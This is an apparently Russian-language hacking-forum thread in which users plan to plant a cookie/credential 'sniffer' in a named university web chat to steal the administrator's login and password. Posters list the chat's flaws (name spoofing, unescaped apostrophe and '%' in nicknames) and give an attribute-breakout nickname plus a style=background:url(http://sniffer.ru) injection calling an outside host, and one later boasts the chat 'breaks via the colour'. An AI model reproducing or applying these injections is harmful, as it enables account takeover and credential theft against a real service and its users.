Алгол,посмотри пожалуйста на этот чат (http://www.dgu.ru/uci/chat/chat.htm).Есть ли там уязвимости???Мне именно нужно сниффер вставить.

p.s. Это древняя версия thankschat'а (как на зеркале).
С флудом всё понятно...зафлудить его любой может,а вот картинку вставить....

Куча глюков.. можно писать от любого имени, можно смотреть приваты наверно...
Проходят символы % в нике что позволяет вставлять скрипты срабатывающие на нажатие (но толку мало так как длинна ника ограниченна 14 символами)
И самое главное:
В нике проходит одинарный апостроф, что позволяет выйти внутрь тега (в списке юзеров).
Проблема опять же в том, что длинна ника ограничена.
Но, думаю если зайти под несколькими хитрыми никами одновременно, то можно все же влепить сниффер.
Первый ник должен быть такой:
`'style=`

Остальное додумывай сам....

Хорошо я зайду под несколькими никами и в том числе под "`'style=`".И что, юзверь должен будет всех их нажиматьhttp://forum.antichat.ru/iB_html/non...s/confused.gifКак этим можно воспользоватьсяhttp://forum.antichat.ru/iB_html/non...s/confused.gif

з.ы. а у тебя получилось сниффануть чатhttp://forum.antichat.ru/iB_html/non...s/confused.gif

Не нужно будет никуда нажимать ...
Нужно выйти внутрь тега, и вставить контсрукцию
типа style=background:url(http://sniffer.ru)

А у тебя получилось это сделать?

нет...
я особо и не пытался....
долго это мудохаться нада...

А зачем собсвенно тебе туда сниффер вставлять ?

Да мне собственно нужно тоже , что и всем тем кто сидит в чате т.е. получить права админа.Для этого нужно проснифить чат и узнать id и pass админа.Вот и всё... :)
Может ты все же попытаешься сниффануть???Если у тебя не получиться , то нахрен мне вообще пытаться :)

сорри, нет времени на это...

:[

Неужели у тебя нет нескольких минут что бы вставить сниффер???Почему ты не хочешь помочь???

Хе хе хе а чат то ломается..... через цвет :)
Оказывается всё так просто....... :))))
Правда админов там уже нет. Жаль. Можно было бы поиздеваться над ними... гы